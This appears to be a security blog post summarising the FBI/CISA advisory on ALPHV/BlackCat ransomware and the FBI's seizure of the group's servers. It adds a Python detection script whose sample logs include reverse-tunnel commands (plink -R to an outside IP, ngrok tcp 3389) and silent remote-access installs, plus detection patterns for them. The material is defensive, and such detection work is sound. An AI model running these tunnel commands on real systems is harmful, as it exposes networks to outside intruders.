ALPHV BlackCat FBI Seizure

CISA Releases Advisory on ALPHV Blackcat Ransomware

On 19 December 2023, the FBI and CISA published a joint cybersecurity advisory (CSA) distributing indicators of compromise (IOCs) and tactics, techniques and procedures (TTPs) relating to the ALPHV/Blackcat ransomware-as-a-service (RaaS) operation.

As of September 2023, investigators from the Federal Bureau of Investigation had determined that the ALPHV (also known as BlackCat) ransomware gang had collected more than $300 million in ransom payments from at least 1,000 victims across the globe. ‘ALPHV Blackcat affiliates have extensive networks and experience with ransomware and data extortion operations,’ the advisory stated.

“As of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities—nearly 75 percent of which are in the United States and approximately 250 outside the United States—demanded over $500 million, and received nearly $300 million in ransom payments.”

ALPHV / BlackCat Ransomware Group Tactics, Techniques and Procedures (TTPs)

To gain initial access to a company, ALPHV Blackcat affiliates combine advanced social engineering with open-source research on the target. Actors pose as the company's IT and/or help desk staff and use phone calls or SMS messages to obtain credentials from employees, which they then use to access the network [T1586]. Once inside, affiliates use uniform resource locators (URLs) to live-chat with victims, convey their demands and initiate the process of restoring encrypted files.

As soon as ALPHV Blackcat affiliates gain access to a victim network, they deploy remote access and file synchronisation software such as AnyDesk, Mega Sync, and Splashtop in preparation for data exfiltration. They also use the legitimate tunnelling tools Plink (the PuTTY command-line SSH client) and Ngrok [S0508] to reach into the network from outside. ALPHV Blackcat affiliates claim to use Brute Ratel C4 [S1063] and Cobalt Strike [S1054] as beacons to their command and control servers.
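The practical detection question for a SOC is whether any of the tools named above are being executed on endpoints that have no business running them. The following Python script is an added example (it is not from the advisory or from The SOC Labs) showing one way to hunt for them in process-creation telemetry. It matches the tool families on the image path, escalates when the binary runs from a user-writable directory or when the command line opens a reverse tunnel (`plink -R`, `ngrok tcp`), and correlates hosts running more than one tool family, which is the staging pattern the advisory describes. The JSON log lines, host names, user names, the Splashtop binary path and the allow-list are all constructed for illustration.

```python
"""Hunt for the remote-access and tunnelling tools named in the advisory
(AnyDesk, Splashtop, MEGAsync, Plink, Ngrok) in process-creation telemetry."""
import json
import re
from pathlib import PureWindowsPath
from typing import Dict, Iterable, List, Set, Tuple

# Constructed sample telemetry (not real logs): one JSON process-creation
# event per line, in a Sysmon Event ID 1-like shape.
SAMPLE_EVENTS = r"""
{"ts":"2023-12-01T09:12:03Z","host":"WS-0142","user":"CORP\\jdoe","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","cmdline":"OUTLOOK.EXE","parent":"explorer.exe"}
{"ts":"2023-12-01T09:40:11Z","host":"WS-0142","user":"CORP\\jdoe","image":"C:\\Users\\jdoe\\AppData\\Local\\Temp\\AnyDesk.exe","cmdline":"AnyDesk.exe --install \"C:\\Program Files (x86)\\AnyDesk\" --silent","parent":"powershell.exe"}
{"ts":"2023-12-01T10:02:45Z","host":"WS-0142","user":"CORP\\jdoe","image":"C:\\Users\\jdoe\\Downloads\\plink.exe","cmdline":"plink.exe -batch -R 3389:127.0.0.1:3389 -pw hunter2 tunnel@203.0.113.7","parent":"cmd.exe"}
{"ts":"2023-12-01T10:15:20Z","host":"SRV-FILE01","user":"CORP\\svc_backup","image":"C:\\Users\\svc_backup\\Downloads\\MEGAsyncSetup64.exe","cmdline":"MEGAsyncSetup64.exe /S","parent":"cmd.exe"}
{"ts":"2023-12-01T10:20:01Z","host":"SRV-FILE01","user":"CORP\\svc_backup","image":"C:\\Windows\\Temp\\ngrok.exe","cmdline":"ngrok.exe tcp 3389","parent":"cmd.exe"}
{"ts":"2023-12-01T11:00:00Z","host":"IT-HELPDESK3","user":"CORP\\helpdesk","image":"C:\\Program Files (x86)\\Splashtop\\Splashtop Remote\\Server\\SRServer.exe","cmdline":"SRServer.exe","parent":"services.exe"}
{"ts":"2023-12-01T11:05:30Z","host":"WS-0219","user":"CORP\\asmith","image":"C:\\Program Files (x86)\\Splashtop\\Splashtop Remote\\Server\\SRServer.exe","cmdline":"SRServer.exe","parent":"services.exe"}
"""

# Substrings of the image path that identify each tool family. Binary names
# other than anydesk/plink/ngrok are illustrative, so match on the product name.
PATH_MARKERS = {"anydesk": "AnyDesk", "splashtop": "Splashtop", "megasync": "MEGAsync"}
BASENAME_TOOLS = {"plink.exe": "Plink", "plink": "Plink", "ngrok.exe": "Ngrok", "ngrok": "Ngrok"}

# Command lines that expose a local service to the outside: plink -R (reverse
# SSH port forward) and ngrok tcp/http/tls (public tunnel to a local port).
TUNNEL_PATTERNS = {
    "Plink": re.compile(r"\s-R\s+\d+:", re.I),
    "Ngrok": re.compile(r"ngrok(?:\.exe)?\s+(?:tcp|http|tls)\b", re.I),
}

# Execution from a user-writable location is the drop-and-run pattern;
# a sanctioned install normally lives under Program Files.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)|Windows\\Temp)\\", re.I
)

# Hypothetical allow-list of (host, tool) pairs the IT team sanctions. Allowed
# pairs are still reported if they run from a user-writable path or open a tunnel.
APPROVED: Set[Tuple[str, str]] = {("IT-HELPDESK3", "Splashtop")}


def identify_tool(image: str) -> str:
    """Return the tool family for an image path, or '' if it is not one we hunt."""
    lowered = image.lower()
    for marker, tool in PATH_MARKERS.items():
        if marker in lowered:
            return tool
    return BASENAME_TOOLS.get(PureWindowsPath(lowered).name, "")


def scan_events(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Flag executions of the hunted tools; escalate tunnels and user-writable paths."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        tool = identify_tool(ev["image"])
        if not tool:
            continue
        reasons = []
        tunnel = TUNNEL_PATTERNS.get(tool)
        if tunnel and tunnel.search(ev["cmdline"]):
            reasons.append("tunnel/port-forward on command line")
        if USER_WRITABLE.search(ev["image"]):
            reasons.append("executed from user-writable path")
        if (ev["host"], tool) in APPROVED and not reasons:
            continue  # sanctioned pair, and nothing suspicious about this run
        findings.append({
            "ts": ev["ts"], "host": ev["host"], "user": ev["user"], "tool": tool,
            "severity": "high" if reasons else "medium",
            "reason": "; ".join(reasons) or "unapproved remote-access tool",
        })
    return findings


def hosts_with_multiple_tools(findings: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Hosts running two or more distinct tool families, i.e. likely exfiltration staging."""
    by_host: Dict[str, Set[str]] = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["tool"])
    return {h: sorted(t) for h, t in by_host.items() if len(t) >= 2}


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS.splitlines())
    for h in hits:
        print(f'{h["ts"]} {h["host"]:<12} {h["severity"]:<6} {h["tool"]:<9} {h["user"]}  {h["reason"]}')
    print("staging hosts:", hosts_with_multiple_tools(hits))
```

Against the constructed events the script reports five findings: the AnyDesk, Plink, MEGAsync and Ngrok runs as high severity, the unapproved Splashtop streamer on WS-0219 as medium, and the sanctioned helpdesk Splashtop instance not at all. Two hosts (WS-0142 and SRV-FILE01) each show two tool families, which is the combination of remote access plus tunnelling or cloud sync worth escalating immediately. In a real deployment the image-path matching should be backed by file hashes or signer checks, since renaming ngrok.exe defeats a basename match.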

ALPHV Blackcat affiliates also use Evilginx2, an open-source adversary-in-the-middle attack framework, to obtain multifactor authentication (MFA) credentials, login credentials, and session cookies. Because Evilginx2 relays the victim's real login and captures the resulting session cookie, it defeats push-notification and one-time-code MFA; only phishing-resistant methods such as FIDO2/WebAuthn bind the authentication to the genuine origin. In addition, the actors obtain passwords from the domain controller, local network, and deleted backup servers.

In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update. The update added features for affiliates, including better defence evasion and additional tooling, and allows ALPHV Blackcat actors to encrypt Windows, Linux, and VMware instances.

FBI Announces ALPHV Blackcat Ransomware Takedown

Following days of rumours that the gang's domain had been taken down, on 19 December 2023 the FBI announced that it had taken control of the ALPHV ransomware servers, allowing it to monitor the group's traffic and obtain decryption keys. The FBI had gained access to ALPHV's backend affiliate panel using the credentials of an affiliate who served as a confidential human source (CHS) for the FBI.

After gaining access to the affiliate portal, the FBI quietly monitored the ransomware operation for a couple of months, collecting the resources and evidence it needed from the portal before disrupting the operation. These resources included decryption keys, which allowed the FBI to help over 500 victims worldwide recover their files for free, saving around $68 million in ransom demands. It is possible that the FBI also exploited vulnerabilities that allowed it to dump the ransomware gang's database or gain further access to its servers, although this has not been confirmed.

After the takedown, a seizure banner appeared on the ransomware operation's data leak domain, stating that the site had been seized as part of an international law enforcement operation.

Figure: ALPHV BlackCat FBI Seizure

Surprise Re-emergence of ALPHV/Blackcat Ransomware Group

However, in a surprising turn of events, on the same day the ALPHV gang claimed to have "unseized" the domain and brought its data leak site back online hours later. In addition, ALPHV claimed on its leak site that it had compromised at least 3,400 victims.

Because both the FBI and the ALPHV group hold the private key for the data leak site's Tor onion address, either party can publish a fresh service descriptor and take control of the illicit domain away from the other, which is why the site changed hands more than once.

Meanwhile, LockBit, another major ransomware-as-a-service (RaaS) group, invited ALPHV/Blackcat affiliates to join its operation.

CISA and FBI Guidance to Mitigate Ransomware Threats

CISA and the FBI encourage critical infrastructure organisations to implement the mitigations in the CSA in order to reduce the likelihood and impact of ALPHV Blackcat ransomware attacks.

Here are some of CISA’s cyber security recommendations to mitigate the threat from ransomware attacks:

  1. Routinely take inventory of assets and data to identify authorized and unauthorized devices and software.

  2. Prioritize remediation of known exploited vulnerabilities.

  3. Enable and enforce multifactor authentication with strong passwords. Given the group's use of Evilginx2 to capture session cookies, prefer phishing-resistant MFA (FIDO2/WebAuthn) over push or one-time-code methods.

  4. Close unused ports and remove applications not deemed necessary for day-to-day operations.

For the full cybersecurity advisory released by the FBI and CISA, refer to #StopRansomware: ALPHV Blackcat | CISA

For more cybersecurity news and updates, follow us on Cybersecurity – The SOC Labs.


Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The SOC Labs assumes no liability for the accuracy or consequences of using this information.

